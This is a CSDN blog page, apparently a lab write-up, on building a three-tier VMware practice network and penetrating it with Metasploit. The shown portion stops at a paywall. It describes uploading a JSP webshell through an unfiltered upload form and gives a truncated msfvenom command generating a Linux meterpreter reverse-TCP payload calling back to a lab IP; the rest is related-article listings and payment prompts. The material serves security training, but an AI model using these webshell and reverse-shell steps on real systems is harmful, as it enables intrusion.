三层网络靶场搭建&MSF内网渗透

最新推荐文章于 2024-10-19 08:57:30 发布
最新推荐文章于 2024-10-19 08:57:30 发布
阅读量403 收藏
点赞数
文章标签: 网络 网络安全 系统安全 计算机网络 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77147728/article/details/129730007
版权
本文通过VMware搭建三层网络环境,使用msf进行内网渗透,涉及网络拓扑、环境搭建、靶机攻破等技术。在每层网络中,通过Nmap扫描、漏洞利用、代理配置等方式逐步渗透,最终获取所有层的控制权。
摘要由CSDN通过智能技术生成

在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。

网络拓扑

环境搭建

首先在虚拟机中新建3块网卡,选择仅主机模式

将kali设为第一层网络vmnet1

将第一层靶机设为双网卡vmnet1和vmnet2

将第二层靶机设置为双网卡:vmnet2和vmnet3:

将第三层靶机设为vmnet3:

至此,我们的3层网络环境就已经搭建完毕。

第一层靶机

Nmap探测一下,发现8080端口:

访问一下:

返现文件上传点,经测试没有任何过滤,可以直接上传任意文件,因此直接上传jsp一句话后门:

上传后返回文件路径,菜刀连接:

为了进一步做内网渗透,上传msf后门:

1、后门制作:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=6666 SessionCommunic

最低0.47元/天 解锁文章
渗透测试
关注
MSF的使用与靶场安装
Cper的博客
10-22 1908
MSF的一些实操练习
网络安全靶场搭建与练习
weixin_46145739的博客
01-02 4001
网络安全靶场搭建与练习 DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞。本教程将以DVWA为例,演示常见的web漏洞的利用和攻击。 DVWA软件截图如下 安装教程 1.安装过程中需要将config目录下的config.inc.php.dist文件名称修改为config.inc.php,同时配置好里面的数据库 $_DVWA[ 'db_server' ] = '127.0.0.1'; $_DVWA[ 'db_database'
网络安全靶场搭建
wu瞌睡虫
09-25 5283
#1 背景介绍 在学习网络安全技术过程中,我们往往需要有一个自己的操作机与多个用来搭建环境的靶机,使用VM虚拟机模拟资源占用较大,成本高、局限性大且使用十分不便。 这时我们可以使用一台安装好Docker环境的linux虚拟机来完成桌面版操作机与WEB靶机的搭建与实验操作。 Docker包括三个基本概念: ●镜像(Image) ●容器(Container) ●仓库(Repository) 操作机与靶机制作: ●kali操作机:kali-top10、xfce、xrdp ●...
内网渗透-ATT&CK第五个攻防靶场环境搭建
a168xzy的博客
12-10 2120
内网渗透-ATT&CK第五个攻防靶场环境搭建 靶场下载地址:download 下载靶场,用vm打开win7和win2008的vmx镜像 打开后到vm中找到编辑,打开网络编辑器,点击更改设置 添加两个网卡 一个使用桥接模式,网卡选择物理机在使用的网卡 另一个使用NAT模式,子网ip使用系统默认 接下来给两个靶机添加网卡 win7一个添加桥接一个添加NAT win2008添加NAT就可以了 ](https://imgchr.com/i/DTdvPU) win2008网络配置 win7网
cfs三层靶机——内网渗透
记录学习
09-09 1527
内网渗透
msf+proxychains组合搭建socks5隧道 | 内网穿透
ULGANOY的博客
08-19 517
socks5隧道 | 内网穿透技术学习
搭建内网靶场并用MSF进行内网穿透/渗透实验
Cwillchris的博客
10-17 4091
实验名称:利用MSF打穿内网 实验人:XX 实验日期:2021.10.16 实验目的:利用MSF进行内网渗透 实验拓扑: 实验环境: 所用机器 网络类型 IP 默认网关 DNS 攻击机:kali NAT 172.16.12.30/24 172.16.12.2 114.114.114.114
网络安全-靶场搭建
weixin_48137911的博客
02-13 1383
靶场网盘链接:链接:https://pan.baidu.com/s/1D_GK07H8Q5L-RdDboM6B9Q?靶场就是给你练习用的,因为如果你直接用其他网站搞会把他搞炸的(犯法的)无论后续的什么靶场,放到这个WWW目录即可打开里面对应的网站进行学习。简单概括:把靶场文件放到Phpstudy的网站,放到根目录里面。然后开启mysql和apache,默认下是关闭的。有些靶场是需要使用数据库的,初始化他们的数据库。由于我这个自动翻译了,你们看到的不一定是这样的。要用到之前下载的phpstudy。
攻防演练靶场环境搭建
Lemlly_Cicter的博客
07-02 1394
大多数公司内网环境都有这些东西,完全模拟真实的企业网络环境,当然,因为服务器配置的关系,肯定不会完全包含。
Cfs三层靶机内网渗透模拟
weixin_68210863的博客
10-23 1058
cfs三层靶机渗透详细过程
极品靶场,多种玩法【实战】红日靶场七:内网综合渗透
最新发布
Eason_LYC安全白帽子的成长博客
10-19 633
收集十多篇该靶场文章,结合自己通关笔记,形成的一份集大成靶场wp
简易服务器渗透靶场搭建asp+jsp+php工具合集
03-22
asp+jsp+php脚本环境搭建,渗透靶场环境搭建,新手专用,免找资源工具合集
红日靶场全流程渗透测试
qq_35349673的博客
03-13 2912
红日靶场全流程渗透测试
内网渗透|内网攻防—多级代理
include_voidmain的博客
03-03 6367
0x01前言 本文讲述由公司的一次内网靶场攻防,对多级代理的建立和配置进行分享,首先介绍一下靶场。 入口是有web漏洞的linux机器,横向到一个有漏洞的winPC上(双网卡),通过双网卡ms17-010到域成员机器上,最后打域控。 这里因为篇幅原因,不说攻打靶场的全过程,直接到frp隧道的建立和连接。 攻击机(kali):172.16.222.128 入口机:192.168.10.10 winPC:192.168.10.20/ 192.168.20.10 ms17-010: 192.168.20.20/
内网靶场_从自做到拿下-自做篇
l805142479的博客
03-14 6013
内网靶场学习,从自己制作靶场到拿下靶场;从frp的隧道搭建,到cs利用frp的反向上线;
内网渗透初探(靶场环境搭建+web层面实验+内网基本操作)
叶子的Blog
01-19 6031
靶场环境搭建 在此我使用的是红日安全的环境 下载地址(红日安全) 图片取自互联网,ip地址以实际地址为准 操作系统 IP地址 攻击者 kali IP地址: 攻击者 Windows 10 IP地址:192.168.31.83 windows 7 外网地址:192.168.31.215 内网地址:192.168.52.143 windows 2008 IP地址:192.168.52.138 windows 2003 IP地址:192.168..
网络攻防平台搭建_网络靶场可视化技术的研究与实现_零基础信息安全自学路线
2401_84915584的博客
07-13 704
【摘要】本文描述了网络靶场可视化的设计方法与技术,提出了可视化是网络靶场平台系统中最能直接感知信息的重要环节,并通过阵营、地形、态势等可视化设计与技术分析
自主搭建三层网络域渗透靶场打靶记录
Innocence_0的博客
10-24 489
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透靶场靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。文中若有不当之处还请各位大佬多多点评公众号:WHOAMIAnony整个靶场网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞。
内网渗透Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
热门推荐
不知名白帽的博客
09-18 1万+
内网渗透Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
内网MSF基础:PostgreSQL配置与权限管理教程
MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为MSF依赖于它来存储数据和配置。 1. **配置PostgreSQL**: - 安装PostgreSQL:通过apt-get...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值